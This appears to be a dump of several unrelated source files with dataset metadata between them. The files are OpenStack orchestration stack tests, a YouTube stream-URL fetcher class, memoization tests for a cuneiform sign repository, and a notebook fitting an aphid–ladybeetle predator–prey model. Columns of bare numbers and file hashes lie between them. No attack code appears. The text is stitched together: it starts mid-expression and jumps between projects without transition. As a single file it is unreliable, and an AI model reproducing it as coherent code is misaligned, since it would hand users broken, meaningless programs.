validate=dict(
json={
'disable_rollback': False,
'parameters': {},
'stack_name': self.stack_name,
'tags': self.stack_tag,
'template': fakes.FAKE_TEMPLATE_CONTENT,
'timeout_mins': 60}
)),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/events?sort_dir=asc'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
json={"events": [
fakes.make_fake_stack_event(
self.stack_id, self.stack_name,
status='CREATE_COMPLETE',
resource_name='name'),
]}),
dict(
method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": self.stack}),
])
self.cloud.create_stack(
self.stack_name,
tags=self.stack_tag,
template_file=test_template.name,
wait=True)
self.assert_calls()
def test_update_stack(self):
test_template = tempfile.NamedTemporaryFile(delete=False)
test_template.write(fakes.FAKE_TEMPLATE.encode('utf-8'))
test_template.close()
self.register_uris([
dict(
method='PUT',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
validate=dict(
json={
'disable_rollback': False,
'parameters': {},
'tags': self.stack_tag,
'template': fakes.FAKE_TEMPLATE_CONTENT,
'timeout_mins': 60}),
json={}),
dict(
method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": self.stack}),
])
self.cloud.update_stack(
self.stack_name,
tags=self.stack_tag,
template_file=test_template.name)
self.assert_calls()
def test_update_stack_wait(self):
marker_event = fakes.make_fake_stack_event(
self.stack_id, self.stack_name, status='CREATE_COMPLETE',
resource_name='name')
marker_qs = 'marker={e_id}&sort_dir=asc'.format(
e_id=marker_event['id'])
test_template = tempfile.NamedTemporaryFile(delete=False)
test_template.write(fakes.FAKE_TEMPLATE.encode('utf-8'))
test_template.close()
self.register_uris([
dict(
method='GET',
uri='{endpoint}/stacks/{name}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name,
qs='limit=1&sort_dir=desc'),
json={"events": [marker_event]}),
dict(
method='PUT',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
validate=dict(
json={
'disable_rollback': False,
'parameters': {},
'tags': self.stack_tag,
'template': fakes.FAKE_TEMPLATE_CONTENT,
'timeout_mins': 60}),
json={}),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/events?{qs}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name,
qs=marker_qs),
json={"events": [
fakes.make_fake_stack_event(
self.stack_id, self.stack_name,
status='UPDATE_COMPLETE',
resource_name='name'),
]}),
dict(
method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(
method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": self.stack}),
])
self.cloud.update_stack(
self.stack_name,
tags=self.stack_tag,
template_file=test_template.name,
wait=True)
self.assert_calls()
def test_get_stack(self):
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": self.stack}),
])
res = self.cloud.get_stack(self.stack_name)
self.assertIsNotNone(res)
self.assertEqual(self.stack['stack_name'], res['name'])
self.assertEqual(self.stack['stack_status'], res['stack_status'])
self.assertEqual('CREATE_COMPLETE', res['status'])
self.assert_calls()
def test_get_stack_in_progress(self):
in_progress = self.stack.copy()
in_progress['stack_status'] = 'CREATE_IN_PROGRESS'
self.register_uris([
dict(method='GET',
uri='{endpoint}/stacks/{name}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
name=self.stack_name),
status_code=302,
headers=dict(
location='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name))),
dict(method='GET',
uri='{endpoint}/stacks/{name}/{id}'.format(
endpoint=fakes.ORCHESTRATION_ENDPOINT,
id=self.stack_id, name=self.stack_name),
json={"stack": in_progress}),
])
res = self.cloud.get_stack(self.stack_name)
self.assertIsNotNone(res)
self.assertEqual(in_progress['stack_name'], res.name)
self.assertEqual(in_progress['stack_status'], res['stack_status'])
self.assertEqual('CREATE_IN_PROGRESS', res['status'])
self.assert_calls()
| 41.536321
| 79
| 0.514214
| 2,535
| 26,874
| 5.251677
| 0.068639
| 0.096672
| 0.088485
| 0.149027
| 0.899647
| 0.884925
| 0.874859
| 0.860963
| 0.848269
| 0.826936
| 0
| 0.004422
| 0.368944
| 26,874
| 646
| 80
| 41.600619
| 0.780588
| 0.019424
| 0
| 0.854484
| 0
| 0
| 0.121374
| 0.078512
| 0
| 0
| 0
| 0
| 0.050761
| 1
| 0.033841
| false
| 0
| 0.010152
| 0
| 0.045685
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
829e718d370d8e92deb1294691f43d900986fb04
| 14,136
|
py
|
Python
|
youtubesearchpython/streamurlfetcher.py
|
marcelosiqueira/youtube-search-python
|
f2fbd1af4781840a76c27385366dd743aaf1ccac
|
[
"MIT"
] | 5
|
2021-03-25T12:09:07.000Z
|
2021-06-07T06:33:43.000Z
|
youtubesearchpython/streamurlfetcher.py
|
marcelosiqueira/youtube-search-python
|
f2fbd1af4781840a76c27385366dd743aaf1ccac
|
[
"MIT"
] | null | null | null |
youtubesearchpython/streamurlfetcher.py
|
marcelosiqueira/youtube-search-python
|
f2fbd1af4781840a76c27385366dd743aaf1ccac
|
[
"MIT"
] | null | null | null |
from typing import Union
from youtubesearchpython.internal.streamurlfetcher import StreamURLFetcherInternal
class StreamURLFetcher(StreamURLFetcherInternal):
'''Gets direct stream URLs for a YouTube video fetched using `Video.get` or `Video.getFormats`.
This class can fetch direct video URLs without any additional network requests (that's really fast).
Call `get` or `getAll` method of this class & pass response returned by `Video.get` or `Video.getFormats` as parameter to fetch direct URLs.
Getting URLs or downloading streams using youtube-dl or PyTube is can be a slow, because of the fact that they make requests to fetch the same content, which one might have already recieved at the time of showing it to the user etc.
This class makes use of PyTube (if installed) & makes some slight improvements to functioning of PyTube.
Avoid instantiating this class more than once, it will be slow (making global object of the class will be a recommended solution).
Raises:
Exception: "ERROR: PyTube is not installed. To use this functionality of youtube-search-python, PyTube must be installed."
Examples:
Returns direct stream URL.
>>> from youtubesearchpython import *
>>> fetcher = StreamURLFetcher()
>>> video = Video.get("https://www.youtube.com/watch?v=aqz-KE-bpKQ")
>>> url = fetcher.get(video, 251)
>>> print(url)
"https://r6---sn-gwpa-5bgk.googlevideo.com/videoplayback?expire=1610798125&ei=zX8CYITXEIGKz7sP9MWL0AE&ip=2409%3A4053%3A803%3A2b22%3Adc68%3Adfb9%3Aa676%3A26a3&id=o-APBakKSE2_eMDMegtCmeWXfuhhUfAzJTmOCWj4lkEjAM&itag=251&source=youtube&requiressl=yes&mh=aP&mm=31%2C29&mn=sn-gwpa-5bgk%2Csn-gwpa-qxad&ms=au%2Crdu&mv=m&mvi=6&pl=36&initcwndbps=146250&vprv=1&mime=audio%2Fwebm&ns=ULL4mkMO31KDtEhOjkOrmpkF&gir=yes&clen=10210834&dur=634.601&lmt=1544629945422176&mt=1610776131&fvip=6&keepalive=yes&c=WEB&txp=5511222&n=uEjSqtzBZaJyVn&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cns%2Cgir%2Cclen%2Cdur%2Clmt&sig=AOq0QJ8wRAIgKKIEiwQTgXsdKPEyOckgVPs_LMH6KJoeaYmZic_lelECIHXHs1ZnSP5mgtpffNlIMJM3DhxcvDbA-4udFFE6AmVP&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=AG3C_xAwRQIhAPmhL745RYeL_ffgUJk_xJLC-8riXKMylLTLA_pITYWWAiB2qUIXur8ThW7cLfQ73mIVK61mMZc2ncK6FZWjUHGcUw%3D%3D"
'''
def __init__(self):
    # No state of its own; base-class construction performs the one-time
    # (slow) setup, which is why a single shared instance is recommended.
    super().__init__()
def get(self, videoFormats: dict, itag: int) -> Union[str, None]:
    '''Return the deciphered direct stream URL for a single itag.

    Args:
        videoFormats (dict): Dictionary returned by `Video.get` or
            `Video.getFormats`.
        itag (int): Itag of the required stream.

    Returns:
        Union[str, None]: The stream URL as a string, or None when no
        stream with the requested itag is present.
    '''
    self._getDecipheredURLs(videoFormats)
    matches = (
        stream["url"]
        for stream in self.player_response["url_encoded_fmt_stream_map"]
        if stream["itag"] == itag
    )
    return next(matches, None)
def getAll(self, videoFormats: dict) -> Union[dict, None]:
    '''Return every deciphered stream URL for a video.

    Args:
        videoFormats (dict): Dictionary returned by `Video.get` or
            `Video.getFormats`.

    Returns:
        Union[dict, None]: Dictionary with a "streams" key holding the
        list of deciphered stream entries (url, type, quality, itag,
        bitrate, is_otf).
    '''
    self._getDecipheredURLs(videoFormats)
    deciphered_streams = self.player_response["url_encoded_fmt_stream_map"]
    return {"streams": deciphered_streams}
| 103.182482
| 1,081
| 0.713356
| 1,671
| 14,136
| 5.985637
| 0.20766
| 0.010798
| 0.017996
| 0.010798
| 0.745451
| 0.740152
| 0.727654
| 0.719356
| 0.711358
| 0.711358
| 0
| 0.163324
| 0.164049
| 14,136
| 136
| 1,082
| 103.941176
| 0.683084
| 0.893676
| 0
| 0.142857
| 0
| 0
| 0.092958
| 0.073239
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| false
| 0
| 0.142857
| 0
| 0.642857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
82d53e2e7141b657585a740ec8c949fdd623b04e
| 3,080
|
py
|
Python
|
ebl/tests/signs/test_memoizing_sign_repository.py
|
ElectronicBabylonianLiterature/dictionary
|
5977a57314cf57f94f75cd12520f178b1d6a6555
|
[
"MIT"
] | 4
|
2020-04-12T14:24:51.000Z
|
2020-10-15T15:48:15.000Z
|
ebl/tests/signs/test_memoizing_sign_repository.py
|
ElectronicBabylonianLiterature/dictionary
|
5977a57314cf57f94f75cd12520f178b1d6a6555
|
[
"MIT"
] | 200
|
2019-12-04T09:53:20.000Z
|
2022-03-30T20:11:31.000Z
|
ebl/tests/signs/test_memoizing_sign_repository.py
|
ElectronicBabylonianLiterature/dictionary
|
5977a57314cf57f94f75cd12520f178b1d6a6555
|
[
"MIT"
] | 1
|
2021-09-06T16:22:39.000Z
|
2021-09-06T16:22:39.000Z
|
from ebl.signs.infrastructure.menoizing_sign_repository import MemoizingSignRepository
def test_find_memoization(sign_repository, signs, when):
    """Repeated find() calls for the same name return the cached object."""
    target = signs[0]
    repository = MemoizingSignRepository(sign_repository)
    repository.create(target)
    first_lookup = repository.find(target.name)
    second_lookup = repository.find(target.name)
    assert first_lookup is second_lookup
def test_search_memoization(sign_repository, signs):
    """search() is memoized: the result is correct and identical across calls."""
    target = signs[0]
    reading = target.values[0]
    repository = MemoizingSignRepository(sign_repository)
    repository.create(target)
    first_result = repository.search(reading.value, reading.sub_index)
    second_result = repository.search(reading.value, reading.sub_index)
    assert first_result == target
    assert first_result is second_result
def test_search_by_lists_name_memoization(sign_repository, signs):
    """search_by_lists_name() is memoized and finds the created sign."""
    target = signs[0]
    listing = target.lists[0]
    repository = MemoizingSignRepository(sign_repository)
    repository.create(target)
    first_result = repository.search_by_lists_name(listing.name, listing.number)
    second_result = repository.search_by_lists_name(listing.name, listing.number)
    assert [target] == first_result
    assert first_result is second_result
def test_search_include_homophones(sign_repository, signs):
    """search_include_homophones() is memoized and finds the created sign."""
    target = signs[0]
    reading_value = target.values[0].value
    repository = MemoizingSignRepository(sign_repository)
    repository.create(target)
    first_result = repository.search_include_homophones(reading_value)
    second_result = repository.search_include_homophones(reading_value)
    assert [target] == first_result
    assert first_result is second_result
def test_search_composite_signs(sign_repository, signs):
    """search_composite_signs() is memoized and finds the created sign."""
    target = signs[0]
    reading = target.values[0]
    repository = MemoizingSignRepository(sign_repository)
    repository.create(target)
    first_result = repository.search_composite_signs(reading.value, reading.sub_index)
    second_result = repository.search_composite_signs(reading.value, reading.sub_index)
    assert [target] == first_result
    assert first_result is second_result
def test_search_by_id(sign_repository, signs):
    """search_by_id() is memoized and finds the created sign by name."""
    target = signs[0]
    sign_name = target.name
    repository = MemoizingSignRepository(sign_repository)
    repository.create(target)
    first_result = repository.search_by_id(sign_name)
    second_result = repository.search_by_id(sign_name)
    assert [target] == first_result
    assert first_result is second_result
def test_search_all(sign_repository, signs):
    """search_all() is memoized and finds the created sign."""
    target = signs[0]
    reading = target.values[0]
    repository = MemoizingSignRepository(sign_repository)
    repository.create(target)
    first_result = repository.search_all(reading.value, reading.sub_index)
    second_result = repository.search_all(reading.value, reading.sub_index)
    assert [target] == first_result
    assert first_result is second_result
| 31.428571
| 86
| 0.772727
| 383
| 3,080
| 5.890339
| 0.091384
| 0.266844
| 0.285461
| 0.154255
| 0.898493
| 0.893174
| 0.867021
| 0.785904
| 0.689273
| 0.62766
| 0
| 0.00613
| 0.152597
| 3,080
| 97
| 87
| 31.752577
| 0.858238
| 0
| 0
| 0.606061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.19697
| 1
| 0.106061
| false
| 0
| 0.015152
| 0
| 0.121212
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82e8d883fd2ccafa52d32f4e80d615c9a103b165
| 389,064
|
py
|
Python
|
notebooks/code_aphid.py
|
Tungdil01/pdeco
|
74f04c13554b72c0ce3e596209a1ab698fdab673
|
[
"MIT"
] | 1
|
2020-11-10T22:29:25.000Z
|
2020-11-10T22:29:25.000Z
|
notebooks/code_aphid.py
|
Tungdil01/pdeco
|
74f04c13554b72c0ce3e596209a1ab698fdab673
|
[
"MIT"
] | 3
|
2021-04-28T03:57:22.000Z
|
2021-05-18T21:35:26.000Z
|
notebooks/code_aphid.py
|
Tungdil01/pdeco
|
74f04c13554b72c0ce3e596209a1ab698fdab673
|
[
"MIT"
] | 1
|
2021-05-10T18:45:59.000Z
|
2021-05-10T18:45:59.000Z
|
#!/usr/bin/env python
# coding: utf-8
# # Aphid-Ladybeetle study
# In[1]:
import numpy as np # linear algebra
from numba import jit
import arviz as az
from arviz.utils import Numba
import matplotlib.pyplot as plt
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
import pymc3 as pm # for uncertainty quantification and model calibration
import theano # to control better pymc3 backend and write a wrapper
import theano.tensor as t # for the wrapper to a custom model to pymc3
import time
import warnings
np.seterr('warn')
warnings.filterwarnings("ignore")
az.style.use("arviz-darkgrid")
Numba.enable_numba()
seed = 1234
np.random.seed(seed)
# ## Obtaining Initial Conditions
#
# We need to define Initial Conditions as functions in order to define them for each discretization point. Here we will fit ICs as polynomial functions.
# Loading data:
# ### 2018_Lin_and_Pennings
# In[2]:
data_dir = "../data/2018 Lin and Pennings/appendix/"
aphid_data = pd.read_csv(data_dir + 'aphid.CSV')
ladybeetle_data = pd.read_csv(data_dir + 'ladybeetle.CSV')
# In[3]:
aphid_data
# In[4]:
ladybeetle_data
# Retrieving IC data:
# In[5]:
aphid_ic = aphid_data[aphid_data.Time == 1].Density.values[0]
ladybeetle_ic = ladybeetle_data[ladybeetle_data.Time == 1].Density.values[0]
# In[6]:
aphid_ic
# In[7]:
ladybeetle_ic
# In[8]:
y0 = aphid_ic, ladybeetle_ic
y0
# In[9]:
import matplotlib.pyplot as plt
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 6))
ax1.plot(aphid_data.Time.values, aphid_data.Density.values, '-o', c='r')
ax1.set(xlabel='Time', ylabel='Population')
ax2.plot(ladybeetle_data.Time.values, ladybeetle_data.Density.values, '-o', c='b')
ax2.set(xlabel='Time')
plt.show()
# # Constant Prey Growth FR1 model
# In[10]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def CP1_model(
    t,
    X,
    r1 = 1,
    a1 = 1,
):
    """RHS of the constant-prey-growth FR1 system.

    du/dt = r1 - a1 * u * v (prey), dv/dt = 0 (predator held constant).
    """
    prey, predator = X
    prey_rate = r1 - a1 * prey * predator
    predator_rate = 0
    return prey_rate, predator_rate
def CP1_ode_solver(
    y0,
    t_span,
    t_eval,
    r1 = 1,
    a1 = 1,
):
    """Integrate the CP1 system with LSODA and return the scipy solution object."""
    return solve_ivp(
        fun=CP1_model,
        t_span=t_span,
        y0=y0,
        t_eval=t_eval,
        args=(r1, a1),
        method="LSODA",
    )
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[11]:
def CP1_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Least-squares residual between the CP1 model and experimental data.

    Args:
        par: Iterable of model parameters forwarded to ``fitting_model``.
        time_exp: Experimental time points (numpy array).
        f_exp: Pair ``(f_exp1, f_exp2)`` of observed series for the two
            quantities of interest (prey and predator densities).
        fitting_model: Solver callable with signature
            ``fitting_model(initial_conditions, time_span, time_exp, *par)``
            returning an object exposing ``.y`` (solution matrix).
        initial_conditions: Initial state passed through to the solver.

    Returns:
        float: Mean of the weighted sums of squared residuals, or ``1e15``
        as a penalty when the solver raises ``ValueError`` (failed run).
    """
    f_exp1, f_exp2 = f_exp
    time_span = (time_exp.min(), time_exp.max())
    # Both series currently contribute equally; kept as named constants so
    # the weighting can be tuned in one place.
    weighting_for_exp1_constraints = 1
    weighting_for_exp2_constraints = 1
    num_of_qoi = len(f_exp)
    try:
        y_model = fitting_model(initial_conditions, time_span, time_exp, *par)
        simulated_qoi1, simulated_qoi2 = y_model.y
        residual1 = f_exp1 - simulated_qoi1
        residual2 = f_exp2 - simulated_qoi2
        first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
        second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
        objective_function = 1 / num_of_qoi * (first_term + second_term)
    except ValueError:
        # Penalize parameter sets for which the integrator fails so the
        # optimizer steers away from them.
        objective_function = 1e15
    return objective_function
def callback_de(xk, convergence):
    """Print the current best parameter vector during Differential Evolution.

    scipy's ``differential_evolution`` invokes this once per generation.
    """
    print('parameters = {}\n'.format(xk))
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[12]:
from scipy import optimize
seed = 1234
r1=6.13939027780853
a1=0.04436839266096163
denom_min = 0.1
denom_max = 1.9
bounds_CP1 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
]
result_CP1 = optimize.differential_evolution(
CP1_least_squares_error_ode,
bounds=bounds_CP1,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
CP1_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_CP1)
# * Retrieving the calibrated parameter values:
# In[13]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
a1_deterministic,
) = result_CP1.x
solution_ODE_CP1 = CP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_CP1.x
)
t_computed_CP1, y_computed_CP1 = solution_ODE_CP1.t, solution_ODE_CP1.y
u_CP1, v_CP1 = y_computed_CP1
parameters_dict = {
"Model": "CP1",
u"$r1$": r1_deterministic,
u"$a1$": a1_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[14]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_CP1, u_CP1, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_CP1, v_CP1, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[15]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[16]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = CP1_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
CP1_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[17]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[18]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_CP1.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[19]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[20]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_CP1 = CP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_CP1.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[21]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[22]:
df_sigmai
# In[23]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_CP1.png", dpi=300)
plt.show()
# In[24]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_CP1.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[25]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Evaluate the pest (prey) time derivative along a computed trajectory.

    Calls ``ode_model`` at each time point with the stacked state
    ``[u, v]`` and collects the first (prey) component of the returned
    derivative pair into a numpy array.
    """
    derivative_values = [
        ode_model(current_time, [u_array[idx], v_array[idx]], *model_pars)[0]
        for idx, current_time in enumerate(time_array)
    ]
    return np.array(derivative_values)
# In[26]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_CP1,
u_CP1,
v_CP1,
CP1_model,
mean_values_params
)
pest_time_derivative_array
# In[27]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_CP1, u_CP1, '-x', label='Pest population')
plt.plot(t_computed_CP1, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_CP1.png", dpi=300)
plt.show()
# In[28]:
mean_values_params = [
r1,
a1,
]
factors_names = [
r"$r1$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[29]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
